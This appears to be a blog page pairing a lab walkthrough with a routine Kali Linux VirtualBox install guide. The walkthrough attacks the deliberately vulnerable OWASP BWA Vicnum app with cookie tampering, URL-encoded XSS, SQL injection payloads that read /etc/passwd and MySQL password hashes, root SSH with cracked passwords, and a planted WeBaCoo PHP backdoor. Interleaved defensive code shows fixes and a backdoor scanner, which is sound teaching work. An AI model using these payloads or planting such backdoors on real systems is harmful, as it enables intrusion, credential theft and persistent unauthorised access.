OWASP Broken Web Apps VM – Vicnum – boot2root challenge Walkthrough

While going over the OWASP top 10 again recently I decided to create a few guides using the OWASP Broken Web Apps VM and show how easy it is to attack these systems. The OWASP top 10 is a great list of methods usually employed to gain access to systems and also to secure them. Why use that zero day you have when you can just attack a system like it’s 1999 again!

What you will need for this exercise:

1 – Kali installed and configured
2 – Pfsense Configured
3 – OWASP Broken Web Apps VM

Step one: perform some active reconnaissance with the OWASP Zed Attack Proxy (ZAP) on Kali. Enter the URL or IP address of the vulnerable OWASP BWA system you’re attacking and click Attack to let ZAP do all the hard work for you!

1_OWASP_Zed_Attack_Proxy_(ZAP)_scanning

From the scan I picked a random URI /vicnum/ to inspect further

2_Selecting_target_Web_Application_Vicnum

Playing the Guessnum game is simple: keep picking 3 digit numbers until you guess all three in the correct positions. I played the game and had the Firefox plugin Firebug enabled while doing so. This led me to something interesting when I won: some cookies with the values of my current player named “zorn”.

3_Playing_Vicnum

I correctly guessed 612 in 15 guesses! I’m happy with that, but what if I wanted to get an even better score of 3 or even 0? Let’s make that happen! Looking at the page located at the URI /vicnum/guessnum4.php you’ll see something interesting if you have Firebug open: the names of cookies. These cookies can be manipulated to send information to the database and modify the results we see on the screen!

Looking at the cookies from the top down:

1 – Milano with the value of 0012AA9B12goodzorn
2 – Brussels with the value of 0029A9B91crisp15
3 – Geneva with the value of 92BEF345Apecan612

By changing the end values of the cookies (in this case zorn, 15 & 612) you can manipulate the database and create your own score.

4_Modifying_Vicnum_cookies

Refresh the page and you are now at the top of the leader board!

5_Vicnum_score_modifed_cookie_manipulation

Above, changing the cookie values to the following yielded an excellent score:

1 – Milano with the value of 0012AA9B12gooditfellover
2 – Brussels with the value of 0029A9B91crisp3
3 – Geneva with the value of 92BEF345Apecan123

Congratulations you just became the best player at Guessnum!
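The edit works because the server accepts whatever the cookies say, so it cannot tell crisp15 from crisp3. The following is an added example, not Vicnum's code, of one common fix when a value has to live in a cookie: append an HMAC so the server can detect changes. The key, the function names and the `value.tag` layout are assumptions made for the illustration.

```python
import hashlib
import hmac

# Assumption: a secret that exists only on the server (constructed demo value).
SERVER_KEY = b"constructed-demo-key"


def _tag(name: str, value: str, key: bytes) -> str:
    # Bind the tag to the cookie name so a signed Geneva value cannot be
    # presented as Brussels.
    msg = name.encode() + b"\x00" + value.encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def sign_cookie(name: str, value: str, key: bytes = SERVER_KEY) -> str:
    """Return 'value.tag' for the server to set as the cookie."""
    return f"{value}.{_tag(name, value, key)}"


def verify_cookie(name: str, cookie: str, key: bytes = SERVER_KEY):
    """Return the original value if the tag is valid, else None."""
    value, sep, tag = cookie.rpartition(".")
    if not sep:
        return None  # unsigned, like the cookies in the walkthrough
    expected = _tag(name, value, key)
    # Constant-time comparison; bytes avoid a TypeError on non-ASCII input.
    if hmac.compare_digest(tag.encode(), expected.encode()):
        return value
    return None


def demo():
    issued = sign_cookie("Brussels", "0029A9B91crisp15")
    tampered = issued.replace("crisp15", "crisp3")  # the edit made in Firebug
    return {
        "untouched": verify_cookie("Brussels", issued),
        "tampered": verify_cookie("Brussels", tampered),
        "unsigned": verify_cookie("Brussels", "0029A9B91crisp3"),
        "wrong_name": verify_cookie("Geneva", issued),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:10} -> {result}")
```

A valid tag only proves the server issued the value, not that it is current, so an old signed cookie can still be replayed. Keeping the score in server-side session state behind an opaque session ID avoids that.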

Let’s go back to ZAP and see what else we can look at:

6_OWASP_Zed_Attack_Proxy_(ZAP)_alerts

Maybe a little Reflected Cross Site Scripting next. ZAP is great as it gives you descriptions of how the attack is performed and also solutions for securing your web application.

To check whether Reflected Cross Site Scripting works on this page, as suggested by ZAP, we can enter the snippet below into the Guessnum player name field:

7_OWASP_Vicnum_Cross_Site_Scripting_Testing_Player_Name

8_Vicnum_Cross_Site_Scripting_Testing_Player_Name_Output

This worked successfully and a little non-malicious pop-up appeared on the screen; this could have been used for malicious means though. This is where the NoScript plugin for browsers shines, as it blocks these attacks while browsing the web, keeping you safe as you wander around looking at random pictures of funny cats.

An interesting XSS attack is this one, which uses a URL that modifies the cookie parameter: it keeps the session and comes back every time you refresh the page, which is nice temporary persistence.

9_Vicnum_Cross_Site_Scripting_Testing_URL_field

Using URL encoding to obfuscate it a bit so it’s not as obvious to the clicker of the link:

#!/usr/bin/env python3

# urllib.parse provides quote_plus, which is needed for the URL encoding
from urllib.parse import quote_plus

# URL is equal to the URL that is used
URL = 'http://192.168.1.102/vicnum/union1.php?admin=N&unionname='
# XSS is equal to the XSS cookie test alert
XSS = '<script>alert("URL XSS Test");</script>'

# Print URL and XSS together, with XSS URL encoded, to give us the encoded URL value. More on URL encoding and quote_plus can be seen here.
print(URL + quote_plus(XSS))

10_Vicnum_Cross_Site_Scripting_python_URL_encoder

Below is the creation of the script above, urlencode.py, chmodding it to make it executable, and the results of running it:

11_Vicnum_Cross_Site_Scripting_python_URL_encoder_chmod_script_execution

The output of the script with the URL encoded looks like this:

12_Vicnum_Cross_Site_Scripting_python_URL_encoded

The result of executing the encoded URL can be seen below:

13_Vicnum_Cross_Site_Scripting_python_URL_encoded_output

Below I entered some JavaScript Cross Site Scripting to print the cookies of the currently logged in player in the Guessnum player name field under the /vicnum/guessnum4.php URI. itfellover in this case was the current player at the time. It doesn’t make a difference whether you know the player name or not: I could have entered “dfgdfg”, or just the JavaScript on its own, to alert on the document.cookie result and get the same alert box.

14_Vicnum_itfellover_Cross_Site_Scripting_Cookie_stealing

15_Vicnum_itfellover_Cross_Site_Scripting_Cookie_stealing_entered

The output seen once this is executed shows the player name itfellover to have been requested from Guessnum who had just played the game and gained a score of 12 by correctly guessing 912 to be the numbers selected for his game.

16_Vicnum_itfellover_Cross_Site_Scripting_Cookie_stealing_output

If we wanted to steal the cookies on the page we could do so and send them back to an attacking system; for the purpose of this exercise we’ll print the cookies out on the page with the modified URL below:

17_Vicnum_itfellover_Cross_Site_Scripting_Cookie_stealing_URL

18_Vicnum_itfellover_Cross_Site_Scripting_Cookie_stealing_URL_output
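From the defender's side, two things matter here: the player name has to be HTML-encoded where it is written into the page, and request monitoring has to percent-decode parameters before inspecting them, otherwise the URL-encoded link above looks harmless. The following is an added example, not code from Vicnum or ZAP. The function names, the markup heuristic and the rendered sentence are assumptions, and the decoder repeats until the value stops changing, which goes slightly beyond the single encoding used in the walkthrough.

```python
import html
import re
from urllib.parse import parse_qsl, quote_plus, unquote_plus, urlsplit

# Markup that has no business in a player name: a tag opener, an inline
# event handler, or a javascript: URL. Heuristic, for alerting only.
MARKUP = re.compile(r"<\s*/?\s*[a-z!]|\bon\w+\s*=|javascript:", re.IGNORECASE)


def fully_decode(value, max_rounds=3):
    """Percent-decode until the value stops changing (bounded)."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(url):
    """Return names of query parameters whose decoded value carries markup."""
    hits = []
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if MARKUP.search(fully_decode(value)):
            hits.append(key)
    return hits


def render_result(player):
    """The actual fix: HTML-encode the name where it is written to the page."""
    return ("You have requested results for Guessnum player "
            + html.escape(player, quote=True))


# Constructed inputs built from the URL and test string in the walkthrough.
BASE = "http://192.168.1.102/vicnum/union1.php?admin=N&unionname="
PAYLOAD = '<script>alert("URL XSS Test");</script>'
ENCODED_URL = BASE + quote_plus(PAYLOAD)
BENIGN_URL = BASE + "zorn"

if __name__ == "__main__":
    for url in (ENCODED_URL, BENIGN_URL):
        print(suspicious_params(url), url)
    print(render_result(PAYLOAD))
```

The detector is only an alerting aid. The encoding in `render_result` is what stops the script from running, whatever form the input arrives in.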

This is excellent: this site is clearly vulnerable to XSS and cookie manipulation, but what else can be poked at? Go back to ZAP and see what else it has detected.

Navigating to http://192.168.1.102/vicnum/cgi-bin/ will show us a directory listing for this web application:

19_Vicnum_directory_listing

SQL Injection:

A simple quote ' in the “Guessnum Player” name entry field – http://192.168.1.102/vicnum/guessnum.html – yields an interesting unsanitised error giving information regarding the database used for the web application.

20_Vicnum_SQL_Injection_testing

Output seen below

You have requested results for Guessnum player ' :ERROR in SELECT name,guess,count,tod FROM guessnumresults WHERE name = ''' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

This is great as it tells us MySQL is in use for this web application and also gives some hints as to what we can use in SQL statements to call from the database

SELECT name,guess,count,tod FROM guessnumresults WHERE name =

You can find out how to emulate the table structure using “union” with this link. This link will help specify a column in the database.

21_Vicnum_SQL_Error_Output

Trying next a very basic piece of SQL injection

' OR 'a'='a

22_Vicnum_SQL_Injection_statement_test

This gives us all the users scores stored in the database:

23_Vicnum_SQL_Injection_Player_database_score_dump

Listing the contents of /etc/passwd using load_file:

' UNION ALL SELECT 1,2,3,load_file('/etc/passwd')#

24_Vicnum_SQL_Injection_etc_passwd_dump

List all mysql users and their hashed passwords:

' UNION ALL SELECT 1,2,user,password FROM mysql.user#

25_Vicnum_SQL_Injection_users_and_password_hashes_dump

This lists everything in the mysql database:

' UNION ALL SELECT 1,table_schema,table_name,column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'#

26_Vicnum_SQL_Full_database_dump
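Every statement in this section works for the same reason: the player name is pasted into the SQL text of the query shown in the error message. The following is an added example, not Vicnum's code, that puts that query shape next to its parameterized form. It uses Python's built-in sqlite3 rather than MySQL so it runs offline, and the rows, function names and error message are constructed for the illustration.

```python
import sqlite3

# Constructed rows; the column names come from the error message above.
ROWS = [
    ("zorn", "612", 15, "constructed-time-1"),
    ("itfellover", "912", 12, "constructed-time-2"),
    ("alice", "345", 7, "constructed-time-3"),
]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE guessnumresults "
               "(name TEXT, guess TEXT, count INTEGER, tod TEXT)")
    db.executemany("INSERT INTO guessnumresults VALUES (?, ?, ?, ?)", ROWS)
    return db


def lookup_concatenated(db, player):
    """Vulnerable: the player name becomes part of the SQL text."""
    sql = ("SELECT name,guess,count,tod FROM guessnumresults "
           "WHERE name = '" + player + "'")
    return db.execute(sql).fetchall()


def lookup_parameterized(db, player):
    """Hardened: the player name is bound as data, never parsed as SQL."""
    sql = "SELECT name,guess,count,tod FROM guessnumresults WHERE name = ?"
    return db.execute(sql, (player,)).fetchall()


def lookup_for_page(db, player):
    """Hardened lookup that also keeps database errors off the page."""
    try:
        return lookup_parameterized(db, player), None
    except sqlite3.Error:
        # Log the detail server-side; show the user nothing about the query.
        return [], "Sorry, something went wrong."


if __name__ == "__main__":
    db = make_db()
    probe = "' OR 'a'='a"
    print("concatenated :", len(lookup_concatenated(db, probe)), "rows")
    print("parameterized:", len(lookup_parameterized(db, probe)), "rows")
    print("single quote :", lookup_for_page(db, "'"))
```

Parameterization closes the injection itself. The load_file and mysql.user reads also needed the application's database account to hold the FILE privilege and SELECT on the mysql schema, neither of which a web application account needs.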

Delicious password hashes, but what are they exactly? Let’s find out by first checking the length of the hashes with a quick Python script:

#!/usr/bin/env python3

# Print the length of the hash string
print(len("73316569DAC7839C2A784FF263F5C0ABBC7086E2"))

27_Vicnum_simple_python_password_hash_count

Chmodding the script to make it executable and running it:

chmod +x ba <– making the script “ba” executable

./ba <– running the executable

28_Vicnum_simple_python_password_hash_count_chmod_and_run

40 characters long which means it’s SHA-1

Let’s create a list with all the hashes by first pasting in the whole page of text like you see below:

29_Vicnum_password_hash_list

Once that’s done let’s clean it up with some awk and sed magic:

awk '{print $NF}' hashes | sed 's/.//' | sed '/^\s*$/d'

awk '{print $NF}' hashes <– Prints out the end of the line which is the hash
sed 's/.//' <– This gets rid of the * at the start of the SHA-1 hash
sed '/^\s*$/d' <– Gets rid of blank and whitespace-only lines

Which leaves us with this output:

30_Vicnum_password_hashes_sorted

Let’s throw this at hashkiller’s SHA-1 Decrypter and see if it’s already cracked the hashes and save us some work:

31_Vicnum_password_hashes_cracked_Hashkiller

All but 5 hashes have been cracked. This is excellent: we can definitely gain access to the system now and own the box fully!

First trying to ssh in as root with the first password in the list “owaspbwa”:

ssh root@192.168.1.102 <– ssh as the user root to 192.168.1.102

32_Vicnum_ssh_root_success_first_attempt

And we’re in as root and we have mail, how kind, we should read it!

cd /var/spool/mail <– Your mail is kept here on most Linux systems

33_Vicnum_OWASP_BWA_mail_directory

There is a wealth of information in here; the www-data mail log especially is filled with interesting URLs and passwords! Let’s add some persistence for now and call it a day with WeBaCoo, creating an obfuscated PHP backdoor to leave on the box.

webacoo -g -o backdoor.php

-g Generate backdoor code
-o Generated backdoor output filename

cat backdoor.php <– Verifies the newly created backdoor

34_Vicnum_OWASP_BWA_WeBaCoo_PHP_backdoor

On the OWASP BWA system, as we already have root on the box, we can go anywhere and do anything, so let’s place the backdoor.php code in the Apache /var/www/ directory so we can come back at any time and gain access again, even if the password is changed for example.

cd /var/www <– change to the /var/www web directory

35_Vicnum_OWASP_BWA_web_directory

Create the obfuscated backdoor in the /var/www/ web directory

cat > backdoor.php <– cat with > will allow you to append text to a file quickly without opening another editor

Paste your own WeBaCoo backdoor and hit CTRL + C to exit cat:

cat backdoor.php <– This is to verify your backdoor was pasted correctly

36_Vicnum_OWASP_BWA_WeBaCoo_backdoor_deployed

Finally a quick check that the backdoor works correctly before we call it a day

webacoo -t -u http://192.168.1.102/backdoor.php

37_Vicnum_OWASP_BWA_WeBaCoo_backdoor_confirmation_test_success
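For whoever has to find a file like this afterwards: the generated backdoor hides its decoder name behind strrev, passes the result to eval and carries its body as one long encoded string, all of which can be matched statically. The following is an added example, not part of WeBaCoo or the original walkthrough, of a small scanner for a web root. The indicator names, the function list, the 120-character threshold and the inert sample file are assumptions chosen for the illustration.

```python
import re
from pathlib import Path

# PHP functions commonly hidden behind strrev() so a plain grep misses them.
SENSITIVE = {"base64_decode", "gzinflate", "str_rot13", "shell_exec", "passthru"}

STRREV_ARG = re.compile(r"strrev\s*\(([^)]*)\)", re.IGNORECASE)
DYNAMIC_EVAL = re.compile(r"eval\s*\(\s*\$\w+\s*\(", re.IGNORECASE)
ENCODED_BLOB = re.compile(r"[A-Za-z0-9+/=]{120,}")


def scan_php(source):
    """Return the list of obfuscation indicators found in PHP source text."""
    found = []
    for arg in STRREV_ARG.findall(source):
        # Drop quotes, dots and spaces used to split the name, then reverse.
        name = re.sub(r"[^A-Za-z0-9_]", "", arg)[::-1].lower()
        if name in SENSITIVE:
            found.append("reversed_function:" + name)
    if DYNAMIC_EVAL.search(source):
        found.append("dynamic_eval")
    # Remove whitespace first: the payload may be padded with spaces.
    if ENCODED_BLOB.search(re.sub(r"\s+", "", source)):
        found.append("encoded_blob")
    return found


def scan_tree(root):
    """Scan every *.php file under root; return {path: indicators} for hits."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_php(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report


# Constructed, inert sample: the "payload" is the base64 of "ABC" repeated.
SAMPLE = ('<?php $b=strrev("edoced_"."46esab");'
          'eval($b(str_replace(" ","","' + "QUJD " * 40 + '"))); ?>')
BENIGN = '<?php echo htmlspecialchars($_GET["name"]); ?>'

if __name__ == "__main__":
    print(scan_php(SAMPLE))
    print(scan_php(BENIGN))
```

Running `scan_tree("/var/www")` on the web server lists each PHP file that trips an indicator. Comparing the web root against a known-good deployment catches files that static patterns miss.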

Congratulations, that was a fun challenge. I look forward to creating some further OWASP BWA tutorials. I hope you have fun playing around with the OWASP Broken Web Applications VM as much as I do!

 

Building an Ethical hacking lab on your laptop with VirtualBox – Part 16 – Kali Linux 2.0 Rolling

Kali Linux was updated a while back and since has had many nice features added to it. I’ve covered other methods of creating your own custom Kali ISO and installing Kali in VirtualBox before. Check out the previous VirtualBox guide for basic configuration and then follow along to complete the updated Kali 2.0 Rolling installation and get guest additions working as it’s changed a little since my last guide.

What you’ll need is the following:

1 – VirtualBox installed with guest additions downloaded
2 – Kali Linux 2.0 ISO downloaded

As mentioned already refer to the previous guide for basic VirtualBox configuration.

Let’s get to it!

Select Install on first boot to start the installation

1_Kali_Linux_2.0_VirtualBox_Install_select_install

Select your desired language

2_Kali_Linux_2.0_VirtualBox_Install_select_language

Select your country

3_Kali_Linux_2.0_VirtualBox_Install_select_country

Select your desired keyboard configuration

4_Kali_Linux_2.0_VirtualBox_Install_select_keyboard_layout

Enter a hostname for your system

5_Kali_Linux_2.0_VirtualBox_Install_enter_a_hostname

Enter a domain name if you want to use one otherwise just hit “Continue”

6_Kali_Linux_2.0_VirtualBox_configure_DNS_if_needed

Enter the password you want to use for the root account and hit “Continue”

7_Kali_Linux_2.0_VirtualBox_configure_enter_root_password

Verify your root password and hit “Continue”

8_Kali_Linux_2.0_VirtualBox_configure_enter_root_password_confirmation

Hit “Enter” to continue the hard disk partitioning using the “Guided – use entire disk” method. Feel free to choose a different method if you wish.

9_Kali_Linux_2.0_VirtualBox_configure_select_disk_partitioning

Hit “Enter” to continue using the selected partition for the hard disk install

10_Kali_Linux_2.0_VirtualBox_configure_select_disk_to_partition

Hit “Enter” to continue installation using the “All files in one partition” partitioning scheme. Feel free to change it.

11_Kali_Linux_2.0_VirtualBox_configure_select_partitioning_scheme

Select “Finish partitioning and write changes to disk” and hit “Enter”

12_Kali_Linux_2.0_VirtualBox_configure_write_changes_to_disk

Select “Yes” to confirm you want to write all your changes to disk and hit “Enter”

13_Kali_Linux_2.0_VirtualBox_configure_write_changes_to_disk_confirmation

Select “No” when asked whether to use a network mirror

14_Kali_Linux_2.0_VirtualBox_configure_select_no_for_a_mirror

Select “Yes” and hit enter to install the GRUB boot loader to the master boot record

15_Kali_Linux_2.0_VirtualBox_configure_select_yes_to_install_the_GRUB_bootloader

Select your hard disk you want to install the GRUB boot loader on and hit “Enter”

16_Kali_Linux_2.0_VirtualBox_configure_select_disk_to_install_the_GRUB_bootloader

Installation is now complete, select “Continue” and hit “Enter” to reboot into your new Kali install

17_Kali_Linux_2.0_VirtualBox_configured_ready_to_reboot

At first login enter the username “root” followed by the password you entered at the start of the install

18_Kali_Linux_2.0_VirtualBox_configured_first_login

Excellent, first logon was a success. Well done so far; only a few steps remain until you can start playing in your lab.

19_Kali_Linux_2.0_VirtualBox_configured_first_logon

During the install we didn’t add repositories, but in order to update and upgrade the system we’ll need to modify /etc/apt/sources.list. Use a text editor of your choice, or use nano like the example below.

20_Kali_Linux_2.0_VirtualBox_modify_apt_sources_list

Add the following repositories to the file, then save it. If using nano like in the example, do this by pressing CTRL+O and then Enter. Exit with CTRL+X.

deb http://http.kali.org/kali kali-rolling main contrib non-free
deb-src http://http.kali.org/kali kali-rolling main contrib non-free

21_Kali_Linux_2.0_VirtualBox_modify_apt_sources_list_repositories

Now that you have some repositories enter the following command into the terminal and hit “Enter”. This will take some time to complete so go grab a beverage of choice and chill out for a bit.

sudo apt-get update && sudo apt-get upgrade -y && sudo apt-get dist-upgrade -y

22_Kali_Linux_2.0_VirtualBox_update_upgrade_dist_upgrade

When prompted to restart services during package upgrades without asking select “Yes” and hit “Enter”

23_Kali_Linux_2.0_VirtualBox_update_upgrade_dist_upgrade_select_yes_to_restart_during_package_upgrades

When prompted if non-superusers should be able to capture packets with Wireshark select “No” and hit “Enter”

24_Kali_Linux_2.0_VirtualBox_select_no_to_disallow_non_superusers_capture_packets_wireshark

Select “Ok” regarding the PostgreSQL version 9.5 obsolete warning and hit “Enter”

25_Kali_Linux_2.0_VirtualBox_select_OK_postgresql_common

If prompted to keep any configurations enter “Y” and hit “Enter” to continue

26_Kali_Linux_2.0_VirtualBox_enter_Y_to_keep_defaults

It took some time, but if you’ve gotten this far you’re doing well. Enter “reboot” and hit “Enter”

27_Kali_Linux_2.0_VirtualBox_update_upgrade_dist_upgrade_complete

This is where things have changed. If you refer to the previous guides on my blog you’ll see that installing VirtualBox Guest Additions used to be different; now, however, all you have to do is enter the following:

sudo apt-get install -y virtualbox-guest-x11

28_Kali_Linux_2.0_VirtualBox_Install_Guest_Additions

Once the installation is complete enter “reboot” and hit “Enter”

29_Kali_Linux_2.0_VirtualBox_Guest_Additions_installed_reboot

You will now have a big full screen and all the other features of Virtual Box Guest additions available

30_Kali_Linux_2.0_VirtualBox_Guest_Additions_installed_rebooted_and_full_screen_achieved

I figured a guide was necessary as I had some issues myself the first time I installed the latest version and imagine others have had the same problem.

That’s it for now, well done getting Kali installed and configured. Have fun playing in your lab!